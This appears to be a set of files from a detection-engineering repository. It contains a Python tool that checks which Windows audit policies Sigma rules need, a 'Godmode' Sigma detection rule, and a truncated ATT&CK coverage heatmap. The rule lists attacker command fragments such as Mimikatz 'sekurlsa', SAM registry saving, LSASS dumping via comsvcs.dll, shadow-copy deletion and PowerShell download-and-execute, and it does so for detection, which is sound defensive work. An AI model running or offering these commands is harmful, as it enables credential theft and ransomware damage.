return yaml_part[part_name]
return None
def get_rule_yaml(file_path: str) -> dict:
data = []
with open(file_path, encoding='utf-8') as f:
yaml_parts = yaml.safe_load_all(f)
for part in yaml_parts:
data.append(part)
return data
def extract_events_ids(detection):
eids_list = []
for key, value in detection.items():
if type(value) == dict:
for key_, value_ in value.items():
if key_ == "EventID":
if type(value_) == int:
eids_list.append(value_)
elif type(value_) == list:
for i in value_:
eids_list.append(i)
else:
pass
return eids_list
def test_invalid_logsource_attributes(path_to_rules):
"""
Returns list of rules that leverage unknown logsource
"""
faulty_rules = []
valid_logsource = [
'category',
'product',
'service',
'definition',
]
for file in yield_next_rule_file_path(path_to_rules):
logsource = get_rule_part(file_path=file, part_name="logsource")
if not logsource:
print("Rule {} has no 'logsource'.".format(file))
faulty_rules.append(file)
continue
valid = True
for key in logsource:
if key.lower() not in valid_logsource:
print("Rule {} has a logsource with an invalid field ({})".format(file, key))
valid = False
elif not isinstance(logsource[key], str):
print("Rule {} has a logsource with an invalid field type ({})".format(file, key))
valid = False
if not valid:
faulty_rules.append(file)
return faulty_rules
def extract_fields(detection):
list_of_fields = []
for key, value in detection.items():
if type(value) == list:
for element in value:
if type(element) == dict:
for key_, value_ in element.items():
field = key_.split("|")[0]
if field not in list_of_fields:
list_of_fields.append(field)
if type(value) == dict:
for key_, value_ in value.items():
field = key_.split("|")[0]
if field not in list_of_fields:
list_of_fields.append(field)
return list_of_fields
def get_logsource_dict(path_to_rules, broken_rules):
"""
Return a list of dicts of all unique log sources
"""
logsource_dict_list_tmp = []
# Add as many specific service log sources we have defined
windows_service_security_dict = defaultdict(list)
windows_service_powershell_dict = defaultdict(list)
windows_category_process_creation_dict = defaultdict(list)
windows_category_ps_module_dict = defaultdict(list)
windows_category_ps_script_dict = defaultdict(list)
for file_ in yield_next_rule_file_path(path_to_rules):
if file_ not in broken_rules:
logsource = get_rule_part(file_path=file_, part_name="logsource")
detection = get_rule_part(file_path=file_, part_name="detection")
logsource.pop("definition", None)
if (("product" in logsource.keys()) and (len(logsource) == 1)):
# We skip rules that do not specify exact services for V0.1 // Mainly the generic MIMIKATZ rule
continue
else:
if "product" in logsource:
# For V0.1 we check for windows logs only
if logsource["product"].lower() == "windows":
if "category" in logsource:
if logsource['category'] == "process_creation":
# {"rule_file_name" : [fields used]}
fields = extract_fields(detection)
windows_category_process_creation_dict[file_] = fields
elif logsource['category'] == "ps_script":
fields = extract_fields(detection)
windows_category_ps_script_dict[file_] = fields
elif logsource['category'] == "ps_module":
# {"rule_file_name" : [fields used]}
fields = extract_fields(detection)
windows_category_ps_module_dict[file_] = fields
elif "service" in logsource:
if logsource["service"].lower() == "security":
eid_list = extract_events_ids(detection)
windows_service_security_dict[file_] = eid_list
elif logsource["service"].lower() == "powershell":
eid_list = extract_events_ids(detection)
windows_service_powershell_dict[file_] = eid_list
return windows_service_security_dict, windows_service_powershell_dict, windows_category_process_creation_dict, windows_category_ps_module_dict, windows_category_ps_script_dict
def enrich_logsource_dict(logsource_dict_list):
for logsource in logsource_dict_list:
if "product" in logsource.keys:
if logsource["product"] == "windows":
if "service" in logsource.keys:
pass
elif "category" in logsource.keys:
pass
def parse_gpresult(gpresult):
"""
Parses GPResult command XML output
"""
enabled_sec_policies = []
enabled_other_logs = defaultdict(list)
tree = ET.parse(gpresult)
root = tree.getroot()
for child in root:
if "ComputerResults" in child.tag:
computerResultsNode = child
break
extensionDataList = []
for i in computerResultsNode:
if "ExtensionData" in i.tag:
extensionDataList.append(i)
for i in extensionDataList:
ext_type = i[0].attrib[next(iter(i[0].attrib))]
if "AuditSettings" in ext_type:
auditSettings = i[0]
for audit in auditSettings:
SubcategoryGuid = ""
SettingValue = ""
for element in audit:
if "SubcategoryGuid" in element.tag:
SubcategoryGuid = element
elif "SettingValue" in element.tag:
SettingValue = element
# If the audit settings is enabled for "Success" or both "Success and Failure". Then it's okay (for V0.1)
if SettingValue.text == "1" or SettingValue.text == "3":
enabled_sec_policies.append(SubcategoryGuid.text.upper())
elif "Registry" in ext_type:
registrySettings = i[0]
for policy in registrySettings:
if "}Policy" in policy.tag:
policyName = ""
policyState = ""
policyCategory = ""
for element in policy:
if "Name" in element.tag:
policyName = element
elif "State" in element.tag:
policyState = element
elif "Category" in element.tag:
policyCategory = element
# {"Category": {"Name": "State"}}
tmp = {policyName.text : policyState.text}
enabled_other_logs[policyCategory.text].append(tmp)
return enabled_sec_policies, enabled_other_logs
if __name__ == "__main__":
print(f"""
_____ _
/ ___/(_)___ _____ ___ ____ _
\__ \/ / __ `/ __ `__ \/ __ `/
___/ / / /_/ / / / / / / /_/ /
/____/_/\__, /_/ /_/ /_/\__,_/ ________ __
/ / /____/ ____ __________ __ _______________ / ____/ /_ ___ _____/ /_____ _____
/ / / __ \/ __ `/ ___/ __ \/ / / / ___/ ___/ _ \ / / / __ \/ _ \/ ___/ //_/ _ \/ ___/
/ /___/ /_/ / /_/ (__ ) /_/ / /_/ / / / /__/ __/ / /___/ / / / __/ /__/ ,< / __/ /
/_____/\____/\__, /____/\____/\__,_/_/ \___/\___/ \____/_/ /_/\___/\___/_/|_|\___/_/
/____/ by Nasreddine Bencherchali (Nextron Systems), v{__version__}
""")
parser = argparse.ArgumentParser(description='SIGMA Logsource Checker')
parser.add_argument('-d', help='Path to input directory (SIGMA rules folder; recursive)', metavar='sigma-rules-folder', required=True)
parser.add_argument('-gp', help='XML output of the command "gpresult.exe /x [path]"', metavar='gpresult')
#parser.add_argument('-sysmon', help='Sysmon configuration', metavar='sysmon-config') # TODO: add Sysmon config parser
parser.add_argument('-v', help='Get audit and logging details for every rule', action="store_true")
#parser.add_argument('-vv', help='Get audit and logging details for every rule', metavar='Very Verbose')
args = parser.parse_args()
if os.path.isdir(args.d):
path_to_rules = args.d
else:
print("The path provided isn't a directory: %s" % args.d)
exit(1)
if args.gp:
gpresult = args.gp
print("Parsing gpresults file (XML) %s ...\n" % args.gp)
subcategory_id, enabled_other_logs = parse_gpresult(gpresult)
else:
subcategory_id = []
enabled_other_logs = OTHER_EVENT_ID_MAPPING
print("Discovering used log sources ...\n")
faulty_rules = test_invalid_logsource_attributes(path_to_rules)
windows_service_security_dict, windows_service_powershell_dict, windows_category_process_creation_dict, windows_category_ps_module_dict, windows_category_ps_script_dict = get_logsource_dict(path_to_rules, faulty_rules)
if args.v:
print("Generating detailed logging requirements information for every rule...\n")
sleep(1)
if windows_category_process_creation_dict:
print(f"\nChecking rules with logsource - 'product: windows / category: process_creation'...")
# We check special fields. If they exist then we suggest the policy to be enabled
for filename, fields in windows_category_process_creation_dict.items():
special_fields_sysmon = []
special_fields_security = []
for field in fields:
if field in WINDOWS_SYSMON_SPECIAL_PROCESS_CREATION_FIELDS:
special_fields_sysmon.append(field)
elif field in WINDOWS_SECURITY_SPECIAL_PROCESS_CREATION_FIELDS:
special_fields_security.append(field)
if special_fields_sysmon:
print("-> Rule '{}' uses fields: {} which Requires Microsoft-Windows-Sysmon EID 1 to be enabled".format(os.path.basename(filename), special_fields_sysmon))
elif special_fields_security:
if "{0CCE922B-69AE-11D9-BED3-505054503030}" not in subcategory_id:
print("-> Rule '{}' uses fields: {} which Requires Microsoft Windows Security Auditing EID 4688 to be enabled".format(os.path.basename(filename), special_fields_security))
else:
if "{0CCE922B-69AE-11D9-BED3-505054503030}" not in subcategory_id:
print("-> Rule '{}' uses fields: {} which Requires 'Microsoft Windows Security Auditing EID 4688' or 'Microsoft-Windows-Sysmon EID 1' to be enabled".format(os.path.basename(filename), fields))
if windows_category_ps_module_dict:
print(f"\nChecking rules with logsource - 'product: windows / category: ps_module'...")
pwsh5_ps_module_enabled = False
pwsh5 = "Windows Components/Windows PowerShell"
#pwsh7 = "PowerShell Core" # TODO: Add PWSH7 Checks
if pwsh5 in enabled_other_logs:
if enabled_other_logs[pwsh5][0]['Turn on Module Logging'] == "Enabled":
pwsh5_ps_module_enabled = True
for filename, fields in windows_category_ps_module_dict.items():
if not pwsh5_ps_module_enabled:
print("-> Rule '{}' uses fields: {} which Requires Microsoft-Windows-PowerShell EID 4103 to be enabled".format(os.path.basename(filename), fields))
if windows_category_ps_script_dict:
print(f"\nChecking rules with logsource - 'product: windows / category: ps_script'...")
pwsh5_ps_script_enabled = False
pwsh5 = "Windows Components/Windows PowerShell"
#pwsh7 = "PowerShell Core" # TODO: Add PWSH7 Checks
if pwsh5 in enabled_other_logs:
if enabled_other_logs[pwsh5][1]['Turn on PowerShell Script Block Logging'] == "Enabled":
pwsh5_ps_script_enabled = True
for filename, fields in windows_category_ps_script_dict.items():
if not pwsh5_ps_script_enabled:
print("-> Rule '{}' uses fields: {} which Requires Microsoft-Windows-PowerShell EID 4104 to be enabled".format(os.path.basename(filename), fields))
if windows_service_security_dict:
print(f"\nChecking rules using logsource - 'product: windows / service: security'...")
for filename, eids in windows_service_security_dict.items():
specific_eids = set()
specific_subcategory = set()
for eid in eids:
for key, value in SECURITY_EVENT_ID_MAPPING.items():
if value['EventIDs']:
if ((eid in value['EventIDs']) and (key not in subcategory_id)):
specific_eids.add(eid)
specific_subcategory.add((key, value['Name']))
specific_eids = list(specific_eids)
specific_subcategory = list(specific_subcategory)
if len(specific_subcategory) > 1:
print("-> Rule '{}' uses EventIDs: {} which Requires:".format(os.path.basename(filename), specific_eids))
for i in specific_subcategory:
print(" - '{}' / {} to be enabled".format(i[1], i[0]))
else:
if len(specific_subcategory) != 0:
print("-> Rule '{}' uses EventIDs: {} which Requires: '{}' / {} to be enabled".format(os.path.basename(filename), specific_eids, specific_subcategory[0][1], specific_subcategory[0][0]))
else:
print("Generating generic logging requirements information for the rule set...")
sleep(1)
# If no verbose mode was triggered we generate a generic audit policy suggestion for all rules
# Process Creation Rules
if windows_category_process_creation_dict:
enable_sysmon = False
enable_4688 = False
print(f"\nChecking rules with logsource - 'product: windows / category: process_creation'...")
# We check special fields. If they exist then we suggest the policy to be enabled
all_process_creation_fields = []
for filename, fields in windows_category_process_creation_dict.items():
all_process_creation_fields += fields
all_process_creation_fields = list(set(all_process_creation_fields))
for field in WINDOWS_SYSMON_SPECIAL_PROCESS_CREATION_FIELDS:
if field in all_process_creation_fields:
enable_sysmon = True
print("-> Rules use Sysmon EID 1 only fields. A Sysmon configuration monitoring Process Creation is required")
break
if not enable_sysmon:
for field in WINDOWS_SECURITY_SPECIAL_PROCESS_CREATION_FIELDS:
if field in all_process_creation_fields:
if "{0CCE922B-69AE-11D9-BED3-505054503030}" not in subcategory_id:
enable_4688 = True
print("-> Rules use Microsoft-Windows-Security-Auditing EID 4688 only fields. Audit policy sub-category {0CCE922B-69AE-11D9-BED3-505054503030} / 'Process Creation' must be enabled")
break
else:
print("Audit policy sub-category {0CCE922B-69AE-11D9-BED3-505054503030} / 'Process Creation' is already enabled")
break
if not enable_4688:
print("-> Audit policy sub-category {0CCE922B-69AE-11D9-BED3-505054503030} / 'Process Creation' must be enabled")
if windows_category_ps_module_dict:
print(f"\nChecking rules with logsource - 'product: windows / category: ps_module'...")
pwsh5 = "Windows Components/Windows PowerShell"
#pwsh7 = "PowerShell Core" # TODO: Add PWSH7 Checks
if pwsh5 in enabled_other_logs:
if enabled_other_logs[pwsh5][0]['Turn on Module Logging'] != "Enabled":
print("-> Rules use Microsoft-Windows-PowerShell EID 4103. Audit policy 'Module Logging' must be enabled")
else:
print("-> PowerShell 'Module Logging' is Enabled")
if windows_category_ps_script_dict:
print(f"\nChecking rules with logsource - 'product: windows / category: ps_script'...")
pwsh5 = "Windows Components/Windows PowerShell"
#pwsh7 = "PowerShell Core" # TODO: Add PWSH7 Checks
if pwsh5 in enabled_other_logs:
if enabled_other_logs[pwsh5][1]['Turn on PowerShell Script Block Logging'] != "Enabled":
print("-> Rules use Microsoft-Windows-PowerShell EID 4104. Audit policy PowerShell 'Script Block Logging' must be enabled")
else:
print("-> PowerShell 'Script Block Logging' is Enabled")
if windows_service_security_dict:
print(f"\nChecking rules using logsource - 'product: windows / service: security'...")
all_security_eids = []
for filename, eids in windows_service_security_dict.items():
all_security_eids += eids
all_security_eids = list(set(all_security_eids))
for eid in all_security_eids:
for key, value in SECURITY_EVENT_ID_MAPPING.items():
if value['EventIDs']:
if ((eid in value['EventIDs']) and (key not in subcategory_id)):
print("-> Rules use events generated from audit policy sub-category '{}'. The audit policy '{}' must be enabled".format(key, value['Name']))
subcategory_id.append(key)
print("\nFor more information on how to setup logging, you can visit: https://github.com/SigmaHQ/sigma/tree/master/rules-documentation/logsource-guides")
================================================
FILE: other/godmode_sigma_rule.yml
================================================
# _____ __ __ ___ __
# / ___/__ ___/ / / |/ /__ ___/ /__
# / (_ / _ \/ _ / / /|_/ / _ \/ _ / -_)
# \___/\___/\_,_/ /_/ /_/\___/\_,_/\__/_
# / __(_)__ ___ _ ___ _ / _ \__ __/ /__
# _\ \/ / _ `/ ' \/ _ `/ / , _/ // / / -_)
# /___/_/\_, /_/_/_/\_,_/ /_/|_|\_,_/_/\__/
# /___/ IDDQD
#
# Florian Roth
# May 2020
# v0.3
#
# A Proof-of-Concept with the most effective search queries
title: Godmode Sigma Rule
id: def6caac-a999-4fc9-8800-cfeff700ba98
description: 'PoC rule to detect malicious activity - following the principle: if you had only one shot, what would you look for?'
status: experimental
author: Florian Roth (Nextron Systems)
date: 2019-12-22
modified: 2022-08-04
level: high
action: global
---
logsource:
category: process_creation
product: windows
detection:
# Different suspicious or malicious command line parameters
selection_plain:
CommandLine|contains:
- ' -NoP ' # Often used in malicious PowerShell commands
- ' -W Hidden ' # Often used in malicious PowerShell commands
- ' -decode ' # Used with certutil
- ' /decode ' # Used with certutil
- ' -e* JAB' # PowerShell encoded commands
- ' -e* SUVYI' # PowerShell encoded commands
- ' -e* SQBFAFgA' # PowerShell encoded commands
- ' -e* aWV4I' # PowerShell encoded commands
- ' -e* IAB' # PowerShell encoded commands
- ' -e* PAA' # PowerShell encoded commands
- ' -e* aQBlAHgA' # PowerShell encoded commands
- 'vssadmin delete shadows' # Ransomware
- 'reg SAVE HKLM\SAM' # save registry SAM - syskey extraction
- ' -ma ' # ProcDump
- 'Microsoft\Windows\CurrentVersion\Run' # Run key in command line - often in combination with REG ADD
- '.downloadstring(' # PowerShell download command
- '.downloadfile(' # PowerShell download command
- ' /ticket:' # Rubeus
- ' sekurlsa' # Mimikatz
- ' p::d ' # Mimikatz
- ';iex(' # PowerShell IEX
- 'schtasks* /create *AppData' # Scheduled task creation pointing to AppData
- ' comsvcs.dll,MiniDump' # Process dumping method apart from procdump
- ' comsvcs.dll,#24' # Process dumping method apart from procdump
- ' comsvcs.dll MiniDump' # Process dumping method apart from procdump
- ' comsvcs.dll #24' # Process dumping method apart from procdump
- ' comsvcs `#' # Process dumping method apart from procdump
- ' comsvcs #' # Process dumping method apart from procdump
- ' comsvcs MiniDump' # Process dumping method apart from procdump
- '.dmp full' # Process dumping method apart from procdump
selection_parent_child:
ParentImage|contains:
# Office Dropper Detection
- '\WINWORD.EXE'
- '\EXCEL.EXE'
- '\POWERPNT.exe'
- '\MSPUB.exe'
- '\VISIO.exe'
- '\OUTLOOK.EXE'
Image|contains:
- '\cmd.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\wscript.exe'
- '\cscript.exe'
- '\schtasks.exe'
- '*\scrcons.exe'
- '\regsvr32.exe'
- '\hh.exe'
- '\wmic.exe'
- '\mshta.exe'
- '\msiexec.exe'
- '\forfiles.exe'
- '\AppData\'
selection_webshells:
Image|contains:
- '\apache*'
- '\tomcat*'
- '\w3wp.exe'
- '\php-cgi.exe'
- '\nginx.exe'
- '\httpd.exe'
CommandLine|contains:
- 'whoami'
- 'net user '
- 'ping -n '
- 'systeminfo'
- '&cd&echo'
- 'cd /d ' # https://www.computerhope.com/cdhlp.htm
# Running whoami as LOCAL_SYSTEM (usually after privilege escalation)
selection_whoami:
Image|contains: '\whoami.exe'
User|contains:
- 'AUTHORI'
- 'AUTORI'
condition: 1 of them
---
logsource:
product: windows
service: sysmon
detection:
selection_file_creation:
EventID: 11
TargetFilename|contains:
- '.dmp' # dump process memory
- 'Desktop\how' # Ransomware
- 'Desktop\decrypt' # Ransomware
selection_registry_modifications:
EventID:
- 12
- 13
TargetObject|contains:
- 'UserInitMprLogonScript' # persistence
- '\CurrentVersion\Image File Execution Options\' # persistence
selection_registry_run:
EventID:
- 12
- 13
TargetObject|contains:
- '\Microsoft\Windows\CurrentVersion\Run\' # persistence
- '\Microsoft\Windows\CurrentVersion\RunOnce\' # persistence
Details|contains:
- 'AppData'
- '\Users\Public\'
- '\Temp\'
- 'powershell'
- 'wscript'
- 'cscript'
condition: 1 of them
---
logsource:
product: windows
service: system
detection:
# Malicious service installs
selection:
EventID: 7045
ServiceName|contains:
- 'WCESERVICE'
- 'WCE SERVICE'
- 'winexesvc'
- 'DumpSvc'
- 'pwdump'
- 'gsecdump'
- 'cachedump'
condition:
1 of them
================================================
FILE: other/sigma_attack_nav_coverage.json
================================================
{
"name": "Sigma Analytics Coverage",
"versions": {
"attack": "18.1",
"navigator": "4.8.1",
"layer": "4.4"
},
"domain": "enterprise-attack",
"description": "Sigma coverage heatmap generated by Sigma CLI with score function count",
"gradient": {
"colors": [
"#66b1ffff",
"#ff66f4ff"
],
"minValue": 0,
"maxValue": 20
},
"techniques": [
{
"techniqueID": "T1078",
"tactic": "defense-evasion",
"score": 60,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1078",
"tactic": "persistence",
"score": 60,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1078",
"tactic": "privilege-escalation",
"score": 60,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1078",
"tactic": "initial-access",
"score": 60,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1114.003",
"tactic": "collection",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1090",
"tactic": "command-and-control",
"score": 22,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1606",
"tactic": "credential-access",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1528",
"tactic": "credential-access",
"score": 14,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1140",
"tactic": "defense-evasion",
"score": 18,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1098",
"tactic": "persistence",
"score": 29,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1098",
"tactic": "privilege-escalation",
"score": 29,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1589",
"tactic": "reconnaissance",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1110",
"tactic": "credential-access",
"score": 25,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1078.004",
"tactic": "defense-evasion",
"score": 40,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1078.004",
"tactic": "persistence",
"score": 40,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1078.004",
"tactic": "privilege-escalation",
"score": 40,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1078.004",
"tactic": "initial-access",
"score": 40,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1552",
"tactic": "credential-access",
"score": 11,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1548",
"tactic": "privilege-escalation",
"score": 22,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1548",
"tactic": "defense-evasion",
"score": 22,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1556",
"tactic": "credential-access",
"score": 12,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1556",
"tactic": "defense-evasion",
"score": 12,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1556",
"tactic": "persistence",
"score": 12,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1098.003",
"tactic": "persistence",
"score": 7,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1098.003",
"tactic": "privilege-escalation",
"score": 7,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1484",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1484",
"tactic": "privilege-escalation",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1098.001",
"tactic": "persistence",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1098.001",
"tactic": "privilege-escalation",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1098.005",
"tactic": "persistence",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1098.005",
"tactic": "privilege-escalation",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1485",
"tactic": "impact",
"score": 20,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1496",
"tactic": "impact",
"score": 13,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1489",
"tactic": "impact",
"score": 19,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1053.003",
"tactic": "execution",
"score": 7,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1053.003",
"tactic": "persistence",
"score": 7,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1053.003",
"tactic": "privilege-escalation",
"score": 7,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1552.007",
"tactic": "credential-access",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1562.004",
"tactic": "defense-evasion",
"score": 29,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1552.001",
"tactic": "credential-access",
"score": 24,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1562.007",
"tactic": "defense-evasion",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1565.001",
"tactic": "impact",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1003",
"tactic": "credential-access",
"score": 34,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1059",
"tactic": "execution",
"score": 94,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1562",
"tactic": "defense-evasion",
"score": 27,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1562.001",
"tactic": "defense-evasion",
"score": 127,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1578",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1578.003",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1531",
"tactic": "impact",
"score": 9,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1621",
"tactic": "credential-access",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1556.006",
"tactic": "credential-access",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1556.006",
"tactic": "defense-evasion",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1556.006",
"tactic": "persistence",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1087.004",
"tactic": "discovery",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1526",
"tactic": "discovery",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1565",
"tactic": "impact",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1074",
"tactic": "collection",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1484.002",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1484.002",
"tactic": "privilege-escalation",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1114",
"tactic": "collection",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1573",
"tactic": "command-and-control",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1199",
"tactic": "initial-access",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1537",
"tactic": "exfiltration",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1486",
"tactic": "impact",
"score": 16,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1020",
"tactic": "exfiltration",
"score": 9,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1136.003",
"tactic": "persistence",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1070",
"tactic": "defense-evasion",
"score": 20,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1550",
"tactic": "defense-evasion",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1550",
"tactic": "lateral-movement",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1550.001",
"tactic": "defense-evasion",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1550.001",
"tactic": "lateral-movement",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1190",
"tactic": "initial-access",
"score": 146,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1059.001",
"tactic": "execution",
"score": 217,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1059.003",
"tactic": "execution",
"score": 44,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1059.004",
"tactic": "execution",
"score": 14,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1059.009",
"tactic": "execution",
"score": 3,
"color": "",
"comment": "",
